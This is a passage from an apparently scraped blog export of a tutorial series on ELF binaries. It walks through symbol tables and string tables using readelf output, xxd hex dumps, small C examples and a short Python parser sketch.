empty for these members, indicating default symbol visibility. There\u0026rsquo;s nothing noteworthy to discuss here.\nSo we move on to the st_shndx (section index) member. This member tells us that all of these symbols are associated with section 0x1 (which is .text, and that does make sense \u0026ndash; the code of these functions belongs in the .text section).\nThe st_value field indicates the offset within the .text section at which these functions begin. So, if you start executing instructions from offset 0x34 in the .text section, you\u0026rsquo;ll be running the mulFunc function. Makes sense??\nThe linker will perform relocation on the object files and generate a final executable binary that will have all the values in the correct places. At that point we won\u0026rsquo;t need the mulFunc string in our ELF file.\nLast but not least, the st_size field provides the size of the function. This helps the magical entity reading the code determine when to stop and understand the boundaries of the function.\n2. 
main.o Performing the same initial process for the main.o file, you will be able yield its symbol table, as shown below.\n[ 11 ] Section Name: .symtab Type: 0x2 Flags: 0x0 Addr: 0x0 Offset: 0x248 Size: 312 Link: 12 Info: 0x4 Addralign: 0x8 Entsize: 24 [ 0 ] Name: Info: 0x00 (Bind: 0x0 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 1 ] Name: main.c Info: 0x04 (Bind: 0x0 | Type: 0x4) Other: 0x0 Shndx: 0xfff1 Value: 0x000000000000 Size: 0x0 [ 2 ] Name: Info: 0x03 (Bind: 0x0 | Type: 0x3) Other: 0x0 Shndx: 0x1 Value: 0x000000000000 Size: 0x0 [ 3 ] Name: Info: 0x03 (Bind: 0x0 | Type: 0x3) Other: 0x0 Shndx: 0x5 Value: 0x000000000000 Size: 0x0 [ 4 ] Name: main Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0x1 Value: 0x000000000000 Size: 0x143 [ 5 ] Name: printf Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 6 ] Name: __isoc99_scanf Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 7 ] Name: addFunc Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 8 ] Name: subFunc Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 9 ] Name: mulFunc Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 10 ] Name: divFunc Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 11 ] Name: puts Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 12 ] Name: __stack_chk_fail Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 In this case, things get a bit more interesting. Let\u0026rsquo;s begin with the same set of symbols: addFunc, subFunc, mulFunc, and divFunc.\nYou\u0026rsquo;ll notice that these symbols are global, but they don\u0026rsquo;t have any associated types. 
This is expected since the symbols are not defined in this file; they are just being called. At this stage, we\u0026rsquo;re not certain if there\u0026rsquo;s anything like these symbols elsewhere, which is why all the other members are zeroed out (undefined). This essentially instructs the magical linker to locate the values of these symbols (linkers are pretty good at this; they will give errors if the symbols aren\u0026rsquo;t found).\nNow, you\u0026rsquo;ll also notice the presence of printf and puts symbols. This may raise a question: \u0026ldquo;I didn\u0026rsquo;t use puts in my code, so why is it there?\u0026rdquo;\nAnswer: It\u0026rsquo;s compiler magic! The compiler observed that the line printf(\u0026quot;Invalid operator\\n\u0026quot;); has no format specifiers and ends with a newline, so it could be expressed as puts(\u0026quot;Invalid operator\u0026quot;);, and it made this conversion during compilation. (The prompt printf(\u0026quot;Enter equation (9 * 6): \u0026quot;); has no trailing newline, so it stays a printf call.) To confirm this, you can generate the compiled code using gcc -S and check the call to the puts function.\nNow, let\u0026rsquo;s examine our mighty main symbol. The st_info indicates that it\u0026rsquo;s a GLOBAL function (with bind=0x1 and type=0x2). This function is located in the 1st section (st_shndx: 0x1) of main.o, which in our case is the .text section. The function begins at offset 0x0, and its size is 0x143. Pretty simple, right?\n(Note: I\u0026rsquo;m leaving __isoc99_scanf and __stack_chk_fail for you. Google them!)\n3. calc This represents the ultimate outcome of the entire compilation, assembly, and linking process \u0026ndash; the final ELF executable binary. 
However, the process to obtain its symbol table remains same.\nHere is the symtab for this ELF binary\n[ 27 ] Section Name: .symtab Type: 0x2 Flags: 0x0 Addr: 0x0 Offset: 0x3050 Size: 768 Link: 28 Info: 0x7 Addralign: 0x8 Entsize: 24 [ 0 ] Name: Info: 0x00 (Bind: 0x0 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 1 ] Name: main.c Info: 0x04 (Bind: 0x0 | Type: 0x4) Other: 0x0 Shndx: 0xfff1 Value: 0x000000000000 Size: 0x0 [ 2 ] Name: libarithmatic.c Info: 0x04 (Bind: 0x0 | Type: 0x4) Other: 0x0 Shndx: 0xfff1 Value: 0x000000000000 Size: 0x0 [ 3 ] Name: Info: 0x04 (Bind: 0x0 | Type: 0x4) Other: 0x0 Shndx: 0xfff1 Value: 0x000000000000 Size: 0x0 [ 4 ] Name: _DYNAMIC Info: 0x01 (Bind: 0x0 | Type: 0x1) Other: 0x0 Shndx: 0x15 Value: 0x000000003de0 Size: 0x0 [ 5 ] Name: __GNU_EH_FRAME_HDR Info: 0x00 (Bind: 0x0 | Type: 0x0) Other: 0x0 Shndx: 0x11 Value: 0x000000002048 Size: 0x0 [ 6 ] Name: _GLOBAL_OFFSET_TABLE_ Info: 0x01 (Bind: 0x0 | Type: 0x1) Other: 0x0 Shndx: 0x17 Value: 0x000000003fe8 Size: 0x0 [ 7 ] Name: __libc_start_main@GLIBC_2.34 Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 8 ] Name: _ITM_deregisterTMCloneTable Info: 0x32 (Bind: 0x2 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 9 ] Name: data_start Info: 0x32 (Bind: 0x2 | Type: 0x0) Other: 0x0 Shndx: 0x18 Value: 0x000000004020 Size: 0x0 [ 10 ] Name: subFunc Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0xe Value: 0x0000000012c6 Size: 0x1a [ 11 ] Name: puts@GLIBC_2.2.5 Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 12 ] Name: _edata Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x18 Value: 0x000000004030 Size: 0x0 [ 13 ] Name: _fini Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x2 Shndx: 0xf Value: 0x000000001330 Size: 0x0 [ 14 ] Name: __stack_chk_fail@GLIBC_2.4 Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 15 ] Name: 
printf@GLIBC_2.2.5 Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 16 ] Name: addFunc Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0xe Value: 0x0000000012ac Size: 0x1a [ 17 ] Name: __data_start Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x18 Value: 0x000000004020 Size: 0x0 [ 18 ] Name: __gmon_start__ Info: 0x32 (Bind: 0x2 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 19 ] Name: __dso_handle Info: 0x17 (Bind: 0x1 | Type: 0x1) Other: 0x2 Shndx: 0x18 Value: 0x000000004028 Size: 0x0 [ 20 ] Name: _IO_stdin_used Info: 0x17 (Bind: 0x1 | Type: 0x1) Other: 0x0 Shndx: 0x10 Value: 0x000000002000 Size: 0x4 [ 21 ] Name: divFunc Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0xe Value: 0x0000000012fa Size: 0x34 [ 22 ] Name: _end Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x19 Value: 0x000000004038 Size: 0x0 [ 23 ] Name: _start Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0xe Value: 0x000000001070 Size: 0x26 [ 24 ] Name: __bss_start Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x19 Value: 0x000000004030 Size: 0x0 [ 25 ] Name: mulFunc Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0xe Value: 0x0000000012e0 Size: 0x1a [ 26 ] Name: main Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0xe Value: 0x000000001169 Size: 0x143 [ 27 ] Name: __isoc99_scanf@GLIBC_2.7 Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 28 ] Name: __TMC_END__ Info: 0x17 (Bind: 0x1 | Type: 0x1) Other: 0x2 Shndx: 0x18 Value: 0x000000004030 Size: 0x0 [ 29 ] Name: _ITM_registerTMCloneTable Info: 0x32 (Bind: 0x2 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 30 ] Name: __cxa_finalize@GLIBC_2.2.5 Info: 0x34 (Bind: 0x2 | Type: 0x2) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 31 ] Name: _init Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x2 Shndx: 0xc Value: 0x000000001000 Size: 0x0 The linking process did introduce numerous 
symbols that exceed the combined count of symbols in both individual object files. To keep things simple (* once again *), we won\u0026rsquo;t dive into the specifics of what these additional symbols do, and we can think of them as a result of linker magic.\nOur primary focus for now remains on the symbols and their properties, even if we don\u0026rsquo;t have detailed knowledge of their functions.\nThese are the symbols we defined ourselves\u0026hellip;\n[ 10 ] Name: subFunc Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0xe Value: 0x0000000012c6 Size: 0x1a [ 16 ] Name: addFunc Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0xe Value: 0x0000000012ac Size: 0x1a [ 21 ] Name: divFunc Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0xe Value: 0x0000000012fa Size: 0x34 [ 25 ] Name: mulFunc Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0xe Value: 0x0000000012e0 Size: 0x1a [ 26 ] Name: main Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0xe Value: 0x000000001169 Size: 0x143 Most members match what we saw in libarithmatic.o and main.o. The notable difference I can identify is the st_shndx value, which has changed but still points to the .text section of the calc file. The important point is that it should reference the .text section, regardless of the section index value.\nAnother difference is in the st_value. In the linked binary, st_value holds the symbol\u0026rsquo;s virtual address rather than an offset into a section of an object file, and with the addition of numerous new symbols the positions of our functions have shifted. Initially, we had the main function in main.o and addFunc in libarithmatic.o, both at offset 0x0. However, when combining them into a single file, one of them had to adjust its offset to make room for the other. This is precisely what occurred here, and there are also other symbols (of function type) that occupied the initial offsets, causing our defined functions to compromise on their offsets.\nOne more intriguing detail is the _start symbol, which has a value of 0x000000001070. 
This offset serves as the entry point of our ELF executable binary. You can verify this using readelf or any method you prefer. If you overwrite the entry point value (e_entry) in the ELF file header, execution starts at some other address instead of glibc\u0026rsquo;s _start function. Because _start performs the startup work for the C runtime environment, the modified binary may or may not work as intended.\nI\u0026rsquo;m sure that\u0026rsquo;s enough for today, ta-ta!\nhttps://developer.ibm.com/articles/au-aix-symbol-visibility/\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://unix.stackexchange.com/questions/472660/what-are-difference-between-the-elf-symbol-visibility-levels\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2023/10/elf-chronicles-symbol-tables/","summary":"\u0026hellip; prologue At this point I hope you have a general idea of how a C program goes through multiple stages/passes and finally an ELF file is generated. Below is a diagram to jog your memory on this\n┌──────────────────┐ │ │ │ hello.c │ // C source │ │ └────────┬─────────┘ │ │ │ /* Compile */ │ │ │ ▼ ┌──────────────────┐ │ │ │ hello.s │ // assembler source │ │ └────────┬─────────┘ │ │ │ /* assemble */ │ │ ▼ ┌──────────────────┐ │ │ │ hello.","title":"Elf Chronicles: Symbol Tables (5/?)"},{"content":"In the article about section headers, you got an introduction to string tables. 
In this article, we will delve deeper into the topic.\n\u0026hellip;prologue We\u0026rsquo;ll start with the same program we used in the previous article about section headers.\n/* file: hello_world.c */ #include \u0026lt;stdio.h\u0026gt; // A macro #define HELLO_MSG1 \u0026#34;Hello World1\u0026#34; // A global variable char HELLO_MSG2[] = \u0026#34;Hello World2\u0026#34;; // main function int main() { // local variable for main char HELLO_MSG3[] = \u0026#34;Hello World3\u0026#34;; // Print messages printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG1); printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG2); printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG3); return 0; } Compile this and then analyze the ELF executable file using readelf (we won\u0026rsquo;t reach for xxd every time).\n❯ readelf --file-header --wide hello_world ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2\u0026#39;s complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: DYN (Position-Independent Executable file) Machine: Advanced Micro Devices X86-64 Version: 0x1 Entry point address: 0x1050 Start of program headers: 64 (bytes into file) Start of section headers: 13608 (bytes into file) Flags: 0x0 Size of this header: 64 (bytes) Size of program headers: 56 (bytes) Number of program headers: 13 Size of section headers: 64 (bytes) Number of section headers: 30 Section header string table index: 29 With this information, you can locate the section header table in the file.\n#################### Explanation ########################### # # xxd \\ # -s \u0026lt;start_of_section_headers\u0026gt; \\ # Start of section headers: 13608 (bytes into file) # -l \u0026lt;total_size_of_all_section_headers\u0026gt; \\ # size_of_one_section_header(64) * total_count_of_section_headers(30) # -c \u0026lt;bytes_to_print_in_a_single_line\u0026gt; \\ # Just to get a section header entry in a single line # \u0026lt;ELF_file\u0026gt; \\ # ... duhh! 
# | nl -v0 - # I wanted to get the line numbers starting from 0. WHY 0?? - because that\u0026#39;s where the array indexing starts ############################################################# ❯ xxd \\ -s 13608 \\ -l $(( 64*30 )) \\ -c 64 \\ hello_world \\ | nl -v0 - 0 00003528: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 ................................................................ 1 00003568: 1b00 0000 0100 0000 0200 0000 0000 0000 1803 0000 0000 0000 1803 0000 0000 0000 1c00 0000 0000 0000 0000 0000 0000 0000 0100 0000 0000 0000 0000 0000 0000 0000 ................................................................ 2 000035a8: 2300 0000 0700 0000 0200 0000 0000 0000 3803 0000 0000 0000 3803 0000 0000 0000 4000 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0000 0000 0000 0000 #...............8.......8.......@............................... 3 000035e8: 3600 0000 0700 0000 0200 0000 0000 0000 7803 0000 0000 0000 7803 0000 0000 0000 2400 0000 0000 0000 0000 0000 0000 0000 0400 0000 0000 0000 0000 0000 0000 0000 6...............x.......x.......$............................... 4 00003628: 4900 0000 0700 0000 0200 0000 0000 0000 9c03 0000 0000 0000 9c03 0000 0000 0000 2000 0000 0000 0000 0000 0000 0000 0000 0400 0000 0000 0000 0000 0000 0000 0000 I............................... ............................... 5 00003668: 5700 0000 f6ff ff6f 0200 0000 0000 0000 c003 0000 0000 0000 c003 0000 0000 0000 1c00 0000 0000 0000 0600 0000 0000 0000 0800 0000 0000 0000 0000 0000 0000 0000 W......o........................................................ 6 000036a8: 6100 0000 0b00 0000 0200 0000 0000 0000 e003 0000 0000 0000 e003 0000 0000 0000 c000 0000 0000 0000 0700 0000 0100 0000 0800 0000 0000 0000 1800 0000 0000 0000 a............................................................... 
7 000036e8: 6900 0000 0300 0000 0200 0000 0000 0000 a004 0000 0000 0000 a004 0000 0000 0000 a800 0000 0000 0000 0000 0000 0000 0000 0100 0000 0000 0000 0000 0000 0000 0000 i............................................................... 8 00003728: 7100 0000 ffff ff6f 0200 0000 0000 0000 4805 0000 0000 0000 4805 0000 0000 0000 1000 0000 0000 0000 0600 0000 0000 0000 0200 0000 0000 0000 0200 0000 0000 0000 q......o........H.......H....................................... 9 00003768: 7e00 0000 feff ff6f 0200 0000 0000 0000 5805 0000 0000 0000 5805 0000 0000 0000 4000 0000 0000 0000 0700 0000 0100 0000 0800 0000 0000 0000 0000 0000 0000 0000 ~......o........X.......X.......@............................... 10 000037a8: 8d00 0000 0400 0000 0200 0000 0000 0000 9805 0000 0000 0000 9805 0000 0000 0000 c000 0000 0000 0000 0600 0000 0000 0000 0800 0000 0000 0000 1800 0000 0000 0000 ................................................................ 11 000037e8: 9700 0000 0400 0000 4200 0000 0000 0000 5806 0000 0000 0000 5806 0000 0000 0000 3000 0000 0000 0000 0600 0000 1700 0000 0800 0000 0000 0000 1800 0000 0000 0000 ........B.......X.......X.......0............................... 12 00003828: a100 0000 0100 0000 0600 0000 0000 0000 0010 0000 0000 0000 0010 0000 0000 0000 1b00 0000 0000 0000 0000 0000 0000 0000 0400 0000 0000 0000 0000 0000 0000 0000 ................................................................ 13 00003868: 9c00 0000 0100 0000 0600 0000 0000 0000 2010 0000 0000 0000 2010 0000 0000 0000 3000 0000 0000 0000 0000 0000 0000 0000 1000 0000 0000 0000 1000 0000 0000 0000 ................ ....... .......0............................... 14 000038a8: a700 0000 0100 0000 0600 0000 0000 0000 5010 0000 0000 0000 5010 0000 0000 0000 7101 0000 0000 0000 0000 0000 0000 0000 1000 0000 0000 0000 0000 0000 0000 0000 ................P.......P.......q............................... 
15 000038e8: ad00 0000 0100 0000 0600 0000 0000 0000 c411 0000 0000 0000 c411 0000 0000 0000 0d00 0000 0000 0000 0000 0000 0000 0000 0400 0000 0000 0000 0000 0000 0000 0000 ................................................................ 16 00003928: b300 0000 0100 0000 0200 0000 0000 0000 0020 0000 0000 0000 0020 0000 0000 0000 1100 0000 0000 0000 0000 0000 0000 0000 0400 0000 0000 0000 0000 0000 0000 0000 ................. ....... ...................................... 17 00003968: bb00 0000 0100 0000 0200 0000 0000 0000 1420 0000 0000 0000 1420 0000 0000 0000 2400 0000 0000 0000 0000 0000 0000 0000 0400 0000 0000 0000 0000 0000 0000 0000 ................. ....... ......$............................... 18 000039a8: c900 0000 0100 0000 0200 0000 0000 0000 3820 0000 0000 0000 3820 0000 0000 0000 7c00 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0000 0000 0000 0000 ................8 ......8 ......|............................... 19 000039e8: d300 0000 0e00 0000 0300 0000 0000 0000 d03d 0000 0000 0000 d02d 0000 0000 0000 0800 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0800 0000 0000 0000 .................=.......-...................................... 20 00003a28: df00 0000 0f00 0000 0300 0000 0000 0000 d83d 0000 0000 0000 d82d 0000 0000 0000 0800 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0800 0000 0000 0000 .................=.......-...................................... 21 00003a68: eb00 0000 0600 0000 0300 0000 0000 0000 e03d 0000 0000 0000 e02d 0000 0000 0000 e001 0000 0000 0000 0700 0000 0000 0000 0800 0000 0000 0000 1000 0000 0000 0000 .................=.......-...................................... 22 00003aa8: f400 0000 0100 0000 0300 0000 0000 0000 c03f 0000 0000 0000 c02f 0000 0000 0000 2800 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0800 0000 0000 0000 .................?......./......(............................... 
23 00003ae8: f900 0000 0100 0000 0300 0000 0000 0000 e83f 0000 0000 0000 e82f 0000 0000 0000 2800 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0800 0000 0000 0000 .................?......./......(............................... 24 00003b28: 0201 0000 0100 0000 0300 0000 0000 0000 1040 0000 0000 0000 1030 0000 0000 0000 1d00 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0000 0000 0000 0000 .................@.......0...................................... 25 00003b68: 0801 0000 0800 0000 0300 0000 0000 0000 2d40 0000 0000 0000 2d30 0000 0000 0000 0300 0000 0000 0000 0000 0000 0000 0000 0100 0000 0000 0000 0000 0000 0000 0000 ................-@......-0...................................... 26 00003ba8: 0d01 0000 0100 0000 3000 0000 0000 0000 0000 0000 0000 0000 2d30 0000 0000 0000 1b00 0000 0000 0000 0000 0000 0000 0000 0100 0000 0000 0000 0100 0000 0000 0000 ........0...............-0...................................... 27 00003be8: 0100 0000 0200 0000 0000 0000 0000 0000 0000 0000 0000 0000 4830 0000 0000 0000 7002 0000 0000 0000 1c00 0000 0600 0000 0800 0000 0000 0000 1800 0000 0000 0000 ........................H0......p............................... 28 00003c28: 0900 0000 0300 0000 0000 0000 0000 0000 0000 0000 0000 0000 b832 0000 0000 0000 5301 0000 0000 0000 0000 0000 0000 0000 0100 0000 0000 0000 0000 0000 0000 0000 .........................2......S............................... 29 00003c68: 1100 0000 0300 0000 0000 0000 0000 0000 0000 0000 0000 0000 0b34 0000 0000 0000 1601 0000 0000 0000 0000 0000 0000 0000 0100 0000 0000 0000 0000 0000 0000 0000 .........................4...................................... Now look back at the readelf output for this line\nSection header string table index: 29 This gives the index for the string table which contains the names of all of the sections\u0026hellip; Remember, sh_name member of section headers did not contained the actual name for the section but a index to section table. 
This is that table: the section header string table (.shstrtab).\nAnalyzing this section header entry further tells us everything about the section.\nindex | offset | sh_name | sh_type | sh_flags | sh_addr | sh_offset | sh_size | sh_link | sh_info | sh_addralign | sh_entsize | 29 | 00003c68: | 1100 0000 | 0300 0000 | 0000 0000 0000 0000 | 0000 0000 0000 0000 | 0b34 0000 0000 0000 | 1601 0000 0000 0000 | 0000 0000 | 0000 0000 | 0100 0000 0000 0000 | 0000 0000 0000 0000 | Right now, the interesting thing for us is the data that resides in this section. To get it, we need sh_offset and sh_size. (Keep in mind that these values are stored in little-endian form.)\n# -s 0x340b is short for 0x000000000000340b (sh_offset) # -l 0x116 is short for 0x0000000000000116 (sh_size) ❯ xxd \\ -s 0x340b \\ -l 0x116 \\ hello_world 0000340b: 002e 7379 6d74 6162 002e 7374 7274 6162 ..symtab..strtab 0000341b: 002e 7368 7374 7274 6162 002e 696e 7465 ..shstrtab..inte 0000342b: 7270 002e 6e6f 7465 2e67 6e75 2e70 726f rp..note.gnu.pro 0000343b: 7065 7274 7900 2e6e 6f74 652e 676e 752e perty..note.gnu. 0000344b: 6275 696c 642d 6964 002e 6e6f 7465 2e41 build-id..note.A 0000345b: 4249 2d74 6167 002e 676e 752e 6861 7368 BI-tag..gnu.hash 0000346b: 002e 6479 6e73 796d 002e 6479 6e73 7472 ..dynsym..dynstr 0000347b: 002e 676e 752e 7665 7273 696f 6e00 2e67 ..gnu.version..g 0000348b: 6e75 2e76 6572 7369 6f6e 5f72 002e 7265 nu.version_r..re 0000349b: 6c61 2e64 796e 002e 7265 6c61 2e70 6c74 la.dyn..rela.plt 000034ab: 002e 696e 6974 002e 7465 7874 002e 6669 ..init..text..fi 000034bb: 6e69 002e 726f 6461 7461 002e 6568 5f66 ni..rodata..eh_f 000034cb: 7261 6d65 5f68 6472 002e 6568 5f66 7261 rame_hdr..eh_fra 000034db: 6d65 002e 696e 6974 5f61 7272 6179 002e me..init_array.. 000034eb: 6669 6e69 5f61 7272 6179 002e 6479 6e61 fini_array..dyna 000034fb: 6d69 6300 2e67 6f74 002e 676f 742e 706c mic..got..got.pl 0000350b: 7400 2e64 6174 6100 2e62 7373 002e 636f t..data..bss..co 0000351b: 6d6d 656e 7400 mment. 
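The little-endian decoding of entry 29 can also be done in a few lines of Python. This is only a minimal sketch: the bytes are the ones from the table for entry 29, while the names SHDR_FORMAT, SHDR_FIELDS, ENTRY_29 and decode_shdr are made up for this illustration and are not part of any tool used in the article.

```python
import struct

# Elf64_Shdr layout: two 32-bit words, four 64-bit values, two 32-bit words,
# two 64-bit values. The leading '<' selects little-endian byte order.
SHDR_FORMAT = '<IIQQQQIIQQ'
SHDR_FIELDS = ('sh_name', 'sh_type', 'sh_flags', 'sh_addr', 'sh_offset',
               'sh_size', 'sh_link', 'sh_info', 'sh_addralign', 'sh_entsize')

# Raw bytes of section header entry 29, one hex string per member.
ENTRY_29 = bytes.fromhex(
    '11000000' '03000000' '0000000000000000' '0000000000000000'
    '0b34000000000000' '1601000000000000' '00000000' '00000000'
    '0100000000000000' '0000000000000000'
)


def decode_shdr(raw):
    '''Hypothetical helper: map one 64-byte entry to a dict of members.'''
    return dict(zip(SHDR_FIELDS, struct.unpack(SHDR_FORMAT, raw)))


shdr = decode_shdr(ENTRY_29)
for name in SHDR_FIELDS:
    print(name, hex(shdr[name]))
```

The sh_offset and sh_size values it prints are the same two numbers passed to xxd with -s and -l.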
The ASCII representation of this section\u0026rsquo;s data chunk confirms that this must be the string table (the one which contains the names of the sections). Now at least we know how to walk through the headers and locate a string table section. This gives us a green signal to go deeper and learn more about string tables.\nString table So, here\u0026rsquo;s the deal: when you\u0026rsquo;ve got a bunch of characters, and you end them with a null character, that whole thing is what we call a \u0026ldquo;string.\u0026rdquo; (At least, that\u0026rsquo;s what I\u0026rsquo;ve learned, and I\u0026rsquo;m sticking with it for now.)\nNow, when it comes to a string table, it\u0026rsquo;s pretty simple. It\u0026rsquo;s just a bunch of these strings all lined up, one after the other. The only twist is that the first byte is always a null character (\\0), so the string at index 0 is the empty string. Now you can put all that data in a section and create a section header for it with type SHT_STRTAB (which is just 0x3 in fancy lingo). And voila, you\u0026rsquo;ve got yourself a proper string table, with a section header entry for it.\nIf you want to picture it, think of it like this - a string table is like a list of strings, where the first one is always an empty string.\n## Every 00 is a null char (in hex) # For Section=.shstrtab (Offset: 0x348b, Size: 278 = 0x116 in hex) ❯ xxd -s 0x348b -l 278 hello 0000348b: 002e 7379 6d74 6162 002e 7374 7274 6162 ..symtab..strtab 0000349b: 002e 7368 7374 7274 6162 002e 696e 7465 ..shstrtab..inte 000034ab: 7270 002e 6e6f 7465 2e67 6e75 2e70 726f rp..note.gnu.pro 000034bb: 7065 7274 7900 2e6e 6f74 652e 676e 752e perty..note.gnu. 
000034cb: 6275 696c 642d 6964 002e 6e6f 7465 2e41 build-id..note.A 000034db: 4249 2d74 6167 002e 676e 752e 6861 7368 BI-tag..gnu.hash 000034eb: 002e 6479 6e73 796d 002e 6479 6e73 7472 ..dynsym..dynstr 000034fb: 002e 676e 752e 7665 7273 696f 6e00 2e67 ..gnu.version..g 0000350b: 6e75 2e76 6572 7369 6f6e 5f72 002e 7265 nu.version_r..re 0000351b: 6c61 2e64 796e 002e 7265 6c61 2e70 6c74 la.dyn..rela.plt 0000352b: 002e 696e 6974 002e 7465 7874 002e 6669 ..init..text..fi 0000353b: 6e69 002e 726f 6461 7461 002e 6568 5f66 ni..rodata..eh_f 0000354b: 7261 6d65 5f68 6472 002e 6568 5f66 7261 rame_hdr..eh_fra 0000355b: 6d65 002e 696e 6974 5f61 7272 6179 002e me..init_array.. 0000356b: 6669 6e69 5f61 7272 6179 002e 6479 6e61 fini_array..dyna 0000357b: 6d69 6300 2e67 6f74 002e 676f 742e 706c mic..got..got.pl 0000358b: 7400 2e64 6174 6100 2e62 7373 002e 636f t..data..bss..co 0000359b: 6d6d 656e 7400 mment. It should be pretty easy to write a parser for this, if not, ask your friend to do it for you. (hint: not me)\nNow, to proceed, let\u0026rsquo;s take a look at the C program that I\u0026rsquo;ll be using for further examples\n/* file: hello.c */ #include \u0026lt;stdio.h\u0026gt; int global1; char global2 = \u0026#39;x\u0026#39;; static int global3 = 9; static void print_globals(void) { printf(\u0026#34;global1 = %d (%p) | global2 = %c (%p) | global3 = %d (%p)\\n\u0026#34;, global1, \u0026amp;global1, global2, \u0026amp;global2, global3, \u0026amp;global3 ); } int main(){ int local1; char local2 = \u0026#39;y\u0026#39;; static int local3 = 6; printf(\u0026#34;Main: %p\\n\u0026#34;, \u0026amp;main); print_globals(); printf(\u0026#34;local1 = %d (%p) | local2 = %c (%p) | local3 = %d (%p)\\n\u0026#34;, local1, \u0026amp;local1, local2, \u0026amp;local2, local3, \u0026amp;local3 ); return 0; } I assume you can compile it and create the ELF binary. After the ELF binary is ready, analyze it to extract the list of all sections with a type of 0x3 (feeling fancy - SHT_STRTAB). 
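For the string table layout described above, here is a minimal sketch of a parser in Python. It is not the parser used in this article; string_at and walk are hypothetical helper names, and SHSTRTAB_PREFIX holds only the first 35 bytes of the .shstrtab dump, which is enough to show the idea.

```python
# First 35 bytes of the .shstrtab dump: the leading null byte followed by
# four null-terminated section names.
SHSTRTAB_PREFIX = bytes.fromhex(
    '002e73796d746162' '002e737472746162'
    '002e7368737472746162' '002e696e7465727000'
)


def string_at(table, offset):
    '''Return the null-terminated string that starts at the given offset.'''
    end = table.index(0, offset)      # position of the terminating null byte
    return table[offset:end].decode('ascii')


def walk(table):
    '''Yield (offset, string) pairs for every string in the table.'''
    offset = 0
    while offset < len(table):
        text = string_at(table, offset)
        yield offset, text
        offset += len(text) + 1       # skip the string and its null byte


for offset, text in walk(SHSTRTAB_PREFIX):
    print('[', offset, ']', text)
```

string_at is also how a member like sh_name gets resolved: the value stored in the header is simply the offset handed to it.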
